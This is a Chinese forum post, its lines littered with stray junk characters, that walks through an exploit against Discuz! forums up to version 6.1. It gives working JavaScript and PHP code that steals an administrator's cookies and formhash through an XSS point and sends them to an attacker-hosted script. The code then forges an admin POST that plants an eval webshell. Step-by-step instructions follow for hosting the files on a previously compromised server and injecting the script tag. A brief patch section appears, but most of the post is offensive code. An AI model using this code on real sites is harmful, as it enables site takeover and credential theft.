Discuz XSS得webshell
8 D$ W+ h4 B) rBy racle @tian6.com
. b* O1 a$ M6 e1 ^" w6 D9 @欢迎转帖.但请保留版权信息.( d( J, X" I+ o5 j3 F
受影响版本 iscuz<=6.1.0,gbk+utf+big5
# A- j* V4 g2 G2 `5 y" I* o$ U; d: o7 }# C
新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.
- J- c* K6 L% j( b6 s6 u+ t$ w0 T) f$ L- U6 ?1 Q5 f
& n, L: ~# j8 X) {5 a5 k
3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706
5 ^/ b& y L$ ~5 r当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.2 p9 X! b- n5 R6 z- Z
( q1 q* y; N# A2 s' l
分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..! }. a- {5 s# d% I- x
本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS
; l6 n! a" E- ^2 @
6 c9 N. b% l) d+ z6 t
: |, n0 a: G8 V* a& j% c----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------
" B* D& i" r( n+ I
: J1 n; T6 w4 k! |9 f2 h
# V3 ^2 k& s; }problem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.
# q, D: e% \6 v. P: @5 P5 o4 }: p
& i5 {4 G$ M5 R8 _+ Sproblem2 ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.
8 \- p7 O9 I+ m; m2 E F+ j$ _2 i" R, ^. n
problem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.0 ?/ }7 Q% K: S; k
' t3 r! q# U2 [5 k4 d
! N! p& X7 @, d5 _7 B下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {
9 w2 S& c# j5 v6 y) K4 s" P1 J5 B& D/ N" ?* H) ^9 F- k4 N w& R
global $runwizardfile, $runwizardhistory;" J, H) O" r( @+ q4 A ~8 F" g
0 W3 {( R% f8 b+ }+ a $fp = fopen($runwizardfile, 'w');' Q! Q5 V! x4 B6 q) L) e
4 |3 W) F6 x! x9 Q$ `" B fwrite($fp, serialize($runwizardhistory));
5 N& Z& f7 p) |" L" x" z* ~
+ \1 a7 `% ]1 P* @ fclose($fp); }- U8 H0 ^6 W* z' \
6 e/ M8 k" w6 f0 O# ?0 Y# b
}/ m! W1 u! L) \2 V1 q
复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.
9 u) W* E% i; P% W( T/ n2 D$ x以下是修补的办法:function saverunwizardhistory() {
6 M' ]/ U$ N$ j0 G2 |* G3 C6 Q) y& p2 U2 W, ]* d
global $runwizardfile, $runwizardhistory;
' X" E! [* B' s4 X5 W: k& z2 z+ F. y/ L, p5 e
$fp = fopen($runwizardfile, 'w');
& n- j! j% x7 |( L& b3 w' ]7 O
2 ]) c: ]$ Z. T6 E$ G' r $s = '<?php exit;?>';$ h( {9 o# y+ c, I9 R' G$ C
+ _! A+ P" ~3 c1 d2 e8 t _
$s .= serialize($runwizardhistory);
8 t& c. E: ^8 Q2 b. P2 o! ^* @
! M# E# z2 i4 {, v fwrite($fp, $s);. @2 c5 r$ A& F! B5 E, H; ^ J
" R; z- _' H+ O( o fclose($fp);
& @% q. C" h# q7 [* ~$ n. F6 n8 u, H2 r5 P; _
}
( c4 O! f4 m/ i. K' B复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.
% E. _- v/ O2 g, d1 G) \1 l1 c/ N+ F; \. R. B; d
3 ^/ D3 g: L7 Q2 z0 L% V9 q8 c: h0 K% g# e( D f# h
----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------
( O7 v1 i" f$ ]
) O1 r- p2 t$ w5 u" Z7 U
5 Z1 e/ ]2 i8 K3 t 以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.) z: z# N( N7 x
' |; x0 J3 m- L$ J& A9 S9 n: P6 o- B我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.
) k! W, B! V7 t" q0 g
+ \' s* m+ }' w) ?' O+ s% e这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.9 ]0 ?/ V: M: R! Z
S. J0 r. g: V$ R- _, ^
首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:
: P+ M! U) \/ B1 x9 _% s# L' X3 {$ R! J
var url="http://目标网站/admincp.php";
, V3 p( j( o" _7 O' B- |- K( g" ?8 j0 b- j9 g: [
/*获得cookies*/; ~4 _. O3 d5 B" z; r" {9 P
- m: a& @4 p! l0 w" I
function getURL(s) {
; b& v- X2 y u. k1 G+ X0 i
+ ~' B$ ?$ X- @: Bvar image = new Image();
4 I% n7 b3 Y G- F1 E
: F1 C$ O. c3 ]1 J- rimage.style.width = 0;9 F4 H$ r0 Z) a/ a2 t
! E" h9 y$ o$ V/ Q. f& R
image.style.height = 0;
; c3 U/ U6 J; J2 l4 Y! b2 U2 Z, K" _* ~& ^' y, z' Z2 o
image.src = s;1 q6 ]5 t' k: w% G& Y' a" X
9 S, h6 H& a' x( s
}
1 v: E" ~% b. t+ f y1 C ~& b
getURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie)); //这里就通过image变量传给了php' `+ C" m; C5 ^* T
复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];- c5 F) e$ Q k5 E$ o
复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) 
1 z# R0 g& w9 D1 i, P1 \7 v$ t; `4 f6 j& a' u Z
4 e/ C4 x6 b4 o) ]& i
获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";. r# F# c. ~0 y, J+ I( w
7 }7 G& z0 e X F5 N, f1 z# M
2 a; P# ~- Z/ }; b( T" [: i8 T3 P; }& s$ B+ H! r
/*hash*/! _6 P1 O. A& I/ ^' W0 p/ M% C: m
/ a& V% X7 h* \, I; Pvar xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");2 ^( i! W" m+ u; a
: G; S- R* v& z) q( c
xmlHttpReq.open("GET", url+"admincp.php?action=home", false);$ t+ e# o7 T- U7 ]
: E& ]$ |- D8 h. r, s8 M
xmlHttpReq.send(); I; `1 n# Z' _7 N
1 X) [% R0 s, _' xvar resource = xmlHttpReq.responseText;3 R$ G; N f$ F& e
- l6 x) T, ^+ r0 }var numero = resource.search(/formhash/);
3 J. ~3 y2 a( X2 m: |, E0 O
5 ?9 a9 k% t7 u. [var formhash=encodeURIComponent(resource.substr(numero+17,8));7 w" m! Q; Z& b2 i( B+ G! d
7 y8 o. |5 ~6 i4 @" t! N6 `; @
" X- d. c, F# I, M3 i' ?
: A8 G- K/ h# t0 q1 r2 |" f9 Ivar post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据
+ C8 f3 K v5 V* R" V5 G$ k
, C4 r2 d( M- V9 SxmlHttpReq.open(" OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信
; n; w" g* y9 t/ V
9 _! ]* i) P) hxmlHttpReq.setRequestHeader("Referer", url);
. [% M6 h( F# r. {+ l1 E8 }8 A% b- B3 {
xmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");- C9 @' \; g2 i, F# U# `
+ S$ C% V6 J% R8 c, h* _5 V2 JxmlHttpReq.setrequestheader("content-length",post.length); ; s& Z' B$ g- b4 z
7 |4 _' |: Y' z) P! X8 k
xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded"); , J/ H* T5 e6 a2 t8 [' M
+ D- z- _* u; ~9 V8 y# f
xmlHttpReq.send(post);//发送数据
% w: C; m: A+ U# D复制代码这里HASH我假设正确,这样提交,也无须cookies
% f8 g2 _0 `6 ~
1 Q2 x( B: \& p2 j再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);3 Q) q6 S/ v- h
6 r, P# p, ^- n: r8 A# O. n F) Y
if (!$sock) die("$errstr ($errno)\n");) t9 s n* g) ?8 B5 j# ^& E
- J$ [, l& o2 U9 g& [4 V R$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';
9 }3 k6 R6 U9 s3 }$ H ?5 x; z1 \/ b# N. E2 S9 U8 \
- M% n; S9 |+ e% E5 T
+ l6 Y9 i! S+ e; [1 C4 U& Afwrite($sock, " OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");
8 v$ ]/ _& v8 {+ E, ^
( s: o0 t4 b+ n, Hfwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");3 U$ }# F! d/ K4 a$ D" m
) T6 R7 d$ s1 F" ffwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");
& I5 w( b4 j: Z6 R% X/ s& t. F& [7 h z
fwrite($sock, "Accept-Language: zh-cn\r\n");
# |$ T6 \. e. O; N( q- f6 ~ I
f* D3 ^7 w/ s# }fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");, X3 ^" l3 \1 W3 B5 M
" ]8 P+ p" J v0 }: `fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
& G$ J, C9 c# R1 G6 b. \# s: A9 f: I, R z$ R2 I
fwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");
4 T+ d' y$ U+ a' A' H, S8 L- L
, k( D5 K C5 S+ `fwrite($sock, "Host: $url\r\n");
; F' m2 J! e& T! U5 f1 V5 `2 a
: R+ O6 K. Z& ~3 }" H6 tfwrite($sock, "Content-Length: ".strlen($data)."\r\n");8 K+ O$ x% Z; M" D7 |
; k2 H4 Z$ X2 u, t" ofwrite($sock, "Connection: Keep-Alive\r\n");
3 C) S* W) l) e( ?: j* U1 g$ i: c6 P3 n
fwrite($sock, "Cache-Control: no-cache\r\n");6 H# Q9 v5 Q4 G3 K2 R5 N7 Y9 o+ U
3 l' b) ^8 P `/ C c; s
fwrite($sock, "Cookie:".$cookies."\r\n\r\n");
: M! [- e3 g# H; `/ ^6 p2 h1 Y
# o W* ~ \) zfwrite($sock, $data);/ i( [. J5 w" s# z: C
$ M. C7 m" y& L% L8 L0 b" v. T$ R6 @/ @
) G; I8 R0 p; C$headers = "";3 a' J- ?+ [# t. A2 A. M
1 A o f. c8 a. v7 H: h% n
while ($str = trim(fgets($sock, 4096)))7 t$ o" D4 {7 E& L6 O' R
3 g' T K( O7 Z4 m8 X, _/ Y/ a $headers .= "$str\n";
8 X% ?) c+ O6 u% c* r3 t2 V( q
, Y" j9 w! U+ g& R; {echo "\n";
g+ A# G1 c7 f8 W# U$ \) a% A! W5 i9 F7 P" M5 o3 f% n
$body = "";
: K, m6 V6 Q0 y3 v
, B1 ~9 Y5 A/ r, h8 Dwhile (!feof($sock))
" e9 c$ `7 V2 z0 c$ T8 W/ U4 O% R' f$ K( |" O' `
$body .= fgets($sock, 4096);; D0 o( T& X' H' X- y; [: E. T
# m& }0 @ u2 H5 b7 f/ ]% J
fclose($sock);" \( v# ^ Q8 a2 g5 D" \& h2 s( H
' D, z$ x* f3 @ q Oecho $body;
7 `- Y: V% d" w- m( X: ~复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^
. Y9 x5 ^' r% A
) p2 O( J. |! I8 @9 O' b& ~! J' b K- f0 U/ m
-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------2 ~) b1 a/ B) v
) h* d$ G5 r8 \( V. E4 K7 x6 D& x* U$ A8 Y6 y+ |8 W" c( j! P
1 HP SOCKET利用方法首先打开racle.js( r2 i* U# d( Y* {5 E/ p: _ t
0 Y% U( w6 S: G @: X. C4 y* E
var url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home: @$ J% l8 T/ F2 S: j3 i
/ x* E5 k; M( E' K. D8 v1 p) q- w4 ^: P, ] l# ^" u/ X) u& c/ @
0 F' e+ `; a% m# Z/ [- Q然后打开racle@tian6.php9 n4 q# L4 l# T% |
3 V; u: F0 @. W4 m
$url="racle@tian6.com"; //改成你要XSS攻击的目标,譬如www.discuz.com+ d: N. c: r/ ?: }- |$ G f0 h
! W8 i$ U- E- y6 D, J0 e* t) n# t+ S
3 O% z* K4 b9 c3 Y2 E$ H* b, J) R
( R0 i. W/ Q1 s$ t9 j' Y
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:# H/ l1 O* ] f6 R
( l3 q& V5 ~) T4 V% g+ jgetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));1 V4 X! y+ |. T: ~5 d
6 x. U# k7 ]6 @9 c% B, N8 g; s为3 f5 A) f' N: U( p5 E
6 v3 E* i0 I- U1 V; L2 k* wgetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
# q. s* ^$ T+ y) [3 _复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.
2 B& | f9 t/ h9 I @1 G! H7 H2 t
4 R1 R. i" \6 v
7 W+ e' i% `3 Q4 D: V6 t$ T# n# l如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
: b8 K( g) {3 ^' D4 |/ |% w
# ?8 u! O1 L4 y, ]. G2 d9 Ivar formhash=encodeURIComponent(resource.substr(numero+17,8));
' U% I0 M& @! p* \$ Q7 p
( s& I( }7 A7 R- ~! L$ U j为
u1 f( M* {9 P3 M
+ ?; F5 P! J. {var formhash=encodeURIComponent(resource.substr(numero+9,8));
Y5 A& A- W# P% `& W复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.
9 \2 E0 x/ S& |% P2 k" `4 |% H6 w* x; w2 b X
如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.
. K7 H0 }% u. Q! @; C3 ~
8 ]7 B' n* ~# A: G/ i+ \& l8 \0 l+ ^如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.8 [) U% i `1 w
. k. v$ P. @! \1 P不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.
* {% Z2 O: Q( Z% Y; z3 R
& I% ]- O/ p4 j0 n2 M |